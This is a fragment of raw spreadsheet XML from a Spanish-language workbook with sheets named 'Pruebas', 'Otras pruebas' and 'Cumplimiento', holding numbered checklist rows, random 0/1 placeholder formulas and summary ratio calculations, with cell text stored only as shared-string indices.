        <f ca="1">SUM(L41:L42)</f>
        <v>0</v>
      </c>
      <c r="M122">
        <f ca="1">SUM(M41:M42)</f>
        <v>1</v>
      </c>
    </row>
    <row r="123" spans="1:13" x14ac:dyDescent="0.35">
      <c r="A123" s="4">
        <v>13.02</v>
      </c>
      <c r="C123" s="4" t="s">
        <v>260</v>
      </c>
      <c r="H123" s="5" t="s">
        <v>399</v>
      </c>
      <c r="J123">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L123">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M123">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="124" spans="1:13" ht="29" x14ac:dyDescent="0.35">
      <c r="A124" s="4">
        <v>13.03</v>
      </c>
      <c r="B124" t="s">
        <v>261</v>
      </c>
      <c r="C124" t="s">
        <v>262</v>
      </c>
      <c r="D124" t="s">
        <v>49</v>
      </c>
      <c r="E124" t="s">
        <v>6</v>
      </c>
      <c r="F124" s="1" t="s">
        <v>263</v>
      </c>
      <c r="J124">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L124">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M124">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="125" spans="1:13" x14ac:dyDescent="0.35">
      <c r="C125" t="s">
        <v>264</v>
      </c>
      <c r="D125" t="s">
        <v>49</v>
      </c>
      <c r="E125" t="s">
        <v>6</v>
      </c>
      <c r="F125" t="s">
        <v>265</v>
      </c>
      <c r="H125" t="s">
        <v>266</v>
      </c>
      <c r="J125">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L125">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M125">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="126" spans="1:13" x14ac:dyDescent="0.35">
      <c r="C126" t="s">
        <v>267</v>
      </c>
      <c r="D126" t="s">
        <v>49</v>
      </c>
      <c r="E126" t="s">
        <v>6</v>
      </c>
      <c r="F126" t="s">
        <v>268</v>
      </c>
      <c r="J126">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L126">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M126">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="127" spans="1:13" x14ac:dyDescent="0.35">
      <c r="C127" t="s">
        <v>269</v>
      </c>
      <c r="D127" t="s">
        <v>49</v>
      </c>
      <c r="E127" t="s">
        <v>6</v>
      </c>
      <c r="F127" t="s">
        <v>270</v>
      </c>
      <c r="J127">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L127">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M127">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="128" spans="1:13" ht="27.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C128" t="s">
        <v>271</v>
      </c>
      <c r="D128" t="s">
        <v>32</v>
      </c>
      <c r="E128" t="s">
        <v>9</v>
      </c>
      <c r="F128" s="1" t="s">
        <v>272</v>
      </c>
      <c r="J128">
        <f t="shared" ca="1" si="2"/>
        <v>0</v>
      </c>
      <c r="L128">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M128">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="129" spans="1:13" ht="58" x14ac:dyDescent="0.35">
      <c r="A129" s="4">
        <v>13.04</v>
      </c>
      <c r="B129" t="s">
        <v>273</v>
      </c>
      <c r="C129" t="s">
        <v>274</v>
      </c>
      <c r="D129" t="s">
        <v>32</v>
      </c>
      <c r="E129" t="s">
        <v>6</v>
      </c>
      <c r="F129" t="s">
        <v>275</v>
      </c>
      <c r="G129" s="1" t="s">
        <v>276</v>
      </c>
      <c r="J129">
        <f t="shared" ref="J129" ca="1" si="8">RANDBETWEEN(0,1)</f>
        <v>1</v>
      </c>
      <c r="L129">
        <f t="shared" ref="L129:M129" ca="1" si="9">RANDBETWEEN(0,1)</f>
        <v>1</v>
      </c>
      <c r="M129">
        <f t="shared" ca="1" si="9"/>
        <v>0</v>
      </c>
    </row>
    <row r="130" spans="1:13" x14ac:dyDescent="0.35">
      <c r="A130" s="4">
        <v>13.05</v>
      </c>
    </row>
  </sheetData>
  <conditionalFormatting sqref="B107:B1048576 B1:B103">
    <cfRule type="duplicateValues" dxfId="2" priority="2"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B104:B106">
    <cfRule type="duplicateValues" dxfId="1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AA69-AA6D-47EE-B0B4-25A3C0EB5ED3}">
  <dimension ref="A1:F22"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D30" sqref="D30"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="2" max="2" width="59.6328125" customWidth="1"/>
    <col min="3" max="3" width="8.36328125" customWidth="1"/>
    <col min="4" max="4" width="33.90625" customWidth="1"/>
    <col min="5" max="5" width="19.1796875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1" t="s">
        <v>278</v>
      </c>
      <c r="B1" t="s">
        <v>29</v>
      </c>
      <c r="C1" t="s">
        <v>3</v>
      </c>
      <c r="D1" t="s">
        <v>2</v>
      </c>
      <c r="E1" t="s">
        <v>281</v>
      </c>
      <c r="F1" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2" t="s">
        <v>277</v>
      </c>
      <c r="B2" t="s">
        <v>279</v>
      </c>
      <c r="C2" t="s">
        <v>9</v>
      </c>
      <c r="D2" t="s">
        <v>280</v>
      </c>
      <c r="E2" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="41" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A3" t="s">
        <v>277</v>
      </c>
      <c r="B3" t="s">
        <v>282</v>
      </c>
      <c r="C3" t="s">
        <v>9</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>283</v>
      </c>
      <c r="E3" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="4" spans="1:6" ht="43.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A4" t="s">
        <v>261</v>
      </c>
      <c r="B4" t="s">
        <v>285</v>
      </c>
      <c r="C4" t="s">
        <v>9</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>284</v>
      </c>
      <c r="E4" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A5" t="s">
        <v>261</v>
      </c>
      <c r="B5" t="s">
        <v>286</v>
      </c>
      <c r="C5" t="s">
        <v>287</v>
      </c>
      <c r="D5" t="s">
        <v>288</v>
      </c>
      <c r="E5" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A6" t="s">
        <v>261</v>
      </c>
      <c r="B6" t="s">
        <v>290</v>
      </c>
      <c r="C6" t="s">
        <v>9</v>
      </c>
      <c r="D6" t="s">
        <v>291</v>
      </c>
      <c r="E6" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A7" t="s">
        <v>292</v>
      </c>
      <c r="B7" t="s">
        <v>293</v>
      </c>
      <c r="C7" t="s">
        <v>9</v>
      </c>
      <c r="D7" t="s">
        <v>294</v>
      </c>
      <c r="E7" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A8" t="s">
        <v>296</v>
      </c>
      <c r="B8" t="s">
        <v>295</v>
      </c>
      <c r="C8" t="s">
        <v>287</v>
      </c>
      <c r="D8" t="s">
        <v>297</v>
      </c>
      <c r="E8" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A9" t="s">
        <v>296</v>
      </c>
      <c r="B9" t="s">
        <v>298</v>
      </c>
      <c r="C9" t="s">
        <v>9</v>
      </c>
      <c r="D9" t="s">
        <v>299</v>
      </c>
      <c r="E9" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A10" t="s">
        <v>208</v>
      </c>
      <c r="B10" t="s">
        <v>308</v>
      </c>
      <c r="C10" t="s">
        <v>9</v>
      </c>
      <c r="D10" t="s">
        <v>309</v>
      </c>
      <c r="E10" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A11" t="s">
        <v>311</v>
      </c>
      <c r="B11" t="s">
        <v>310</v>
      </c>
      <c r="C11" t="s">
        <v>6</v>
      </c>
      <c r="D11" t="s">
        <v>312</v>
      </c>
      <c r="E11" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A12" t="s">
        <v>296</v>
      </c>
      <c r="B12" t="s">
        <v>314</v>
      </c>
      <c r="C12" t="s">
        <v>6</v>
      </c>
      <c r="D12" t="s">
        <v>315</v>
      </c>
      <c r="E12" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A13" t="s">
        <v>292</v>
      </c>
      <c r="B13" t="s">
        <v>316</v>
      </c>
      <c r="C13" t="s">
        <v>6</v>
      </c>
      <c r="D13" t="s">
        <v>317</v>
      </c>
      <c r="E13" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="14" spans="1:6" ht="21" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A14" t="s">
        <v>318</v>
      </c>
      <c r="B14" t="s">
        <v>319</v>
      </c>
      <c r="C14" t="s">
        <v>9</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>320</v>
      </c>
      <c r="E14" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A15" t="s">
        <v>322</v>
      </c>
      <c r="B15" t="s">
        <v>323</v>
      </c>
      <c r="C15" t="s">
        <v>6</v>
      </c>
      <c r="D15" t="s">
        <v>321</v>
      </c>
      <c r="E15" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A16" t="s">
        <v>325</v>
      </c>
      <c r="B16" t="s">
        <v>324</v>
      </c>
      <c r="C16" t="s">
        <v>9</v>
      </c>
      <c r="D16" t="s">
        <v>326</v>
      </c>
      <c r="E16" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A17" t="s">
        <v>327</v>
      </c>
      <c r="B17" t="s">
        <v>328</v>
      </c>
      <c r="C17" t="s">
        <v>6</v>
      </c>
      <c r="D17" t="s">
        <v>329</v>
      </c>
      <c r="E17" t="s">
        <v>289</v>
      </c>
      <c r="F17" t="s">
        <v>330</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A18" t="s">
        <v>334</v>
      </c>
      <c r="B18" t="s">
        <v>335</v>
      </c>
      <c r="C18" t="s">
        <v>9</v>
      </c>
      <c r="D18" t="s">
        <v>336</v>
      </c>
      <c r="E18" t="s">
        <v>289</v>
      </c>
      <c r="F18" t="s">
        <v>337</v>
      </c>
    </row>
    <row r="19" spans="1:6" ht="26.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A19" t="s">
        <v>338</v>
      </c>
      <c r="B19" t="s">
        <v>339</v>
      </c>
      <c r="C19" t="s">
        <v>9</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>340</v>
      </c>
      <c r="E19" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.35">
      <c r="D20" s="1"/>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.35">
      <c r="D21" s="1"/>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.35">
      <c r="D22" s="1"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="A20:A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360D-AB02-4155-A64C-BC8E069CBA9F}">
  <dimension ref="A1:C6"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A9" sqref="A9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="27.6328125" customWidth="1"/>
    <col min="2" max="2" width="62.453125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A1" t="s">
        <v>29</v>
      </c>
      <c r="B1" t="s">
        <v>2</v>
      </c>
      <c r="C1" t="s">
        <v>365</v>
      </c>
    </row>
    <row r="2" spans="1:3" ht="29" x14ac:dyDescent="0.35">
      <c r="A2" s="1" t="s">
        <v>367</v>
      </c>
      <c r="B2" t="s">
        <v>366</v>
      </c>
      <c r="C2" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A3" t="s">
        <v>370</v>
      </c>
      <c r="B3" t="s">
        <v>368</v>
      </c>
      <c r="C3" t="s">
        <v>369</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A4" t="s">
        <v>372</v>
      </c>
      <c r="B4" t="s">
        <v>371</v>
      </c>
      <c r="C4" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A5" t="s">
        <v>374</v>
      </c>
      <c r="B5" t="s">
        <v>373</v>
      </c>
      <c r="C5" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A6" t="s">
        <v>375</v>
      </c>
      <c r="C6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DB26-FF86-48BC-A10D-74FD43D5F8AE}">
  <dimension ref="A1:V40"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="R28" sqref="R28"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="2" max="2" width="11.453125" customWidth="1"/>
    <col min="3" max="3" width="13.36328125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:22" x14ac:dyDescent="0.35">
      <c r="A1" t="s">
        <v>385</v>
      </c>
      <c r="B1" t="s">
        <v>386</v>
      </c>
      <c r="C1" t="s">
        <v>378</v>
      </c>
      <c r="D1" t="s">
        <v>387</v>
      </c>
      <c r="G1" t="s">
        <v>385</v>
      </c>
      <c r="H1" t="s">
        <v>386</v>
      </c>
      <c r="I1" t="s">
        <v>378</v>
      </c>
      <c r="J1" t="s">
        <v>387</v>
      </c>
      <c r="M1" t="s">
        <v>385</v>
      </c>
      <c r="N1" t="s">
        <v>386</v>
      </c>
      <c r="O1" t="s">
        <v>378</v>
      </c>
      <c r="P1" t="s">
        <v>387</v>
      </c>
      <c r="S1" t="s">
        <v>385</v>
      </c>
      <c r="T1" t="s">
        <v>386</v>
      </c>
      <c r="U1" t="s">
        <v>378</v>
      </c>
      <c r="V1" t="s">
        <v>387</v>
      </c>
    </row>
    <row r="2" spans="1:22" x14ac:dyDescent="0.35">
      <c r="A2">
        <v>12.01</v>
      </c>
      <c r="B2">
        <f ca="1">SUM(Pruebas!J2:J30)/29</f>
        <v>0.62068965517241381</v>
      </c>
      <c r="C2">
        <f ca="1">SUM(Pruebas!L2:L30)/29</f>
        <v>0.41379310344827586</v>
      </c>
      <c r="D2">
        <f ca="1">SUM(Pruebas!M2:M30)/29</f>
        <v>0.44827586206896552</v>
      </c>
      <c r="G2">
        <v>12.04</v>
      </c>
      <c r="H2">
        <f ca="1">SUM(Pruebas!J82:J89)/12</f>
        <v>0.41666666666666669</v>
      </c>
      <c r="I2">
        <f ca="1">SUM(Pruebas!L82:L89)/12</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="J2">
        <f ca="1">SUM(Pruebas!M82:M89)/12</f>
        <v>0.5</v>
      </c>
      <c r="M2">
        <v>12.07</v>
      </c>
      <c r="N2">
        <f ca="1">SUM(Pruebas!J107:J111)/5</f>
        <v>0.6</v>
      </c>
      <c r="O2">
        <f ca="1">SUM(Pruebas!L107:L111)/5</f>
        <v>0.4</v>
      </c>
      <c r="P2">
        <f ca="1">SUM(Pruebas!M107:M111)/5</f>
        <v>0.8</v>
      </c>
      <c r="S2">
        <v>13.03</v>
      </c>
      <c r="T2">
        <f ca="1">SUM(Pruebas!J124:J128)/5</f>
        <v>0.6</v>
      </c>
      <c r="U2">
        <f ca="1">SUM(Pruebas!L124:L128)/5</f>
        <v>0.4</v>
      </c>
      <c r="V2">
        <f ca="1">SUM(Pruebas!M124:M128)/5</f>
        <v>0.2</v>
      </c>
    </row>
    <row r="20" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A20" t="s">
        <v>385</v>
      </c>
      <c r="B20" t="s">
        <v>386</v>
      </c>
      <c r="C20" t="s">
        <v>378</v>
      </c>
      <c r="D20" t="s">
        <v>387</v>
      </c>
      <c r="G20" t="s">
        <v>385</v>
      </c>
      <c r="H20" t="s">
        <v>386</v>
      </c>
      <c r="I20" t="s">
        <v>378</v>
      </c>
      <c r="J20" t="s">
        <v>387</v>
      </c>
      <c r="M20" t="s">
        <v>385</v>
      </c>
      <c r="N20" t="s">
        <v>386</v>
      </c>
      <c r="O20" t="s">
        <v>378</v>
      </c>
      <c r="P20" t="s">
        <v>387</v>
      </c>
    </row>
    <row r="21" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A21">
        <v>12.02</v>
      </c>
      <c r="B21">
        <f ca="1">SUM(Pruebas!J31:J57)/29</f>
        <v>0.41379310344827586</v>
      </c>
      <c r="C21">
        <f ca="1">SUM(Pruebas!L31:L57)/29</f>
        <v>0.41379310344827586</v>
      </c>
      <c r="D21">
        <f ca="1">SUM(Pruebas!M31:M57)/29</f>
        <v>0.48275862068965519</v>
      </c>
      <c r="G21">
        <v>12.05</v>
      </c>
      <c r="H21">
        <f ca="1">SUM(Pruebas!J90:J97)/20</f>
        <v>0.4</v>
      </c>
      <c r="I21">
        <f ca="1">SUM(Pruebas!L90:L97)/20</f>
        <v>0.3</v>
      </c>
      <c r="J21">
        <f ca="1">SUM(Pruebas!M90:M97)/20</f>
        <v>0.5</v>
      </c>
      <c r="M21">
        <v>12.08</v>
      </c>
      <c r="N21">
        <f ca="1">SUM(Pruebas!J112:J114)/3</f>
        <v>1</v>
      </c>
      <c r="O21">
        <f ca="1">SUM(Pruebas!L112:L114)/3</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="P21">
        <f ca="1">SUM(Pruebas!M112:M114)/3</f>
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A39" t="s">
        <v>385</v>
      </c>
      <c r="B39" t="s">
        <v>386</v>
      </c>
      <c r="C39" t="s">
        <v>378</v>
      </c>
      <c r="D39" t="s">
        <v>387</v>
      </c>
      <c r="G39" t="s">
        <v>385</v>
      </c>
      <c r="H39" t="s">
        <v>386</v>
      </c>
      <c r="I39" t="s">
        <v>378</v>
      </c>
      <c r="J39" t="s">
        <v>387</v>
      </c>
      <c r="M39" t="s">
        <v>385</v>
      </c>
      <c r="N39" t="s">
        <v>386</v>
      </c>
      <c r="O39" t="s">
        <v>378</v>
      </c>
      <c r="P39" t="s">
        <v>387</v>
      </c>
    </row>
    <row r="40" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A40">
        <v>12.03</v>
      </c>
      <c r="B40">
        <f ca="1">SUM(Pruebas!J58:J81)/25</f>
        <v>0.36</v>
      </c>
      <c r="C40">
        <f ca="1">SUM(Pruebas!L58:L81)/25</f>
        <v>0.48</v>
      </c>
      <c r="D40">
        <f ca="1">SUM(Pruebas!M58:M81)/25</f>
        <v>0.56000000000000005</v>
      </c>
      <c r="G40">
        <v>12.06</v>
      </c>
      <c r="H40">
        <f ca="1">SUM(Pruebas!J98:J106)/26</f>
        <v>0.38461538461538464</v>
      </c>
      <c r="I40">
        <f ca="1">SUM(Pruebas!L98:L106)/26</f>
        <v>0.38461538461538464</v>
      </c>
      <c r="J40">
        <f ca="1">SUM(Pruebas!M98:M106)/26</f>
        <v>0.57692307692307687</v>
      </c>
      <c r="M40">
        <v>13.01</v>
      </c>
      <c r="N40">
        <f ca="1">SUM(Pruebas!J115:J122)/12</f>
        <v>0.41666666666666669</v>
      </c>
      <c r="O40">
        <f ca="1">SUM(Pruebas!L115:L122)/12</f>
        <v>0.25</v>
      </c>
      <c r="P40">
        <f ca="1">SUM(Pruebas!M115:M122)/12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Pruebas</vt:lpstr>
      <vt:lpstr>Otras pruebas</vt:lpstr>
      <vt:lpstr>Cumplimiento</vt:lpstr>
      <vt:lpstr>Graf_PT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BT-Marco</dc:creator>
  <cp:lastModifiedBy>BT-Marco</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-05T18:38:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-17T22:47:16Z</dcterms:modified>
</cp:coreProperties>
</file>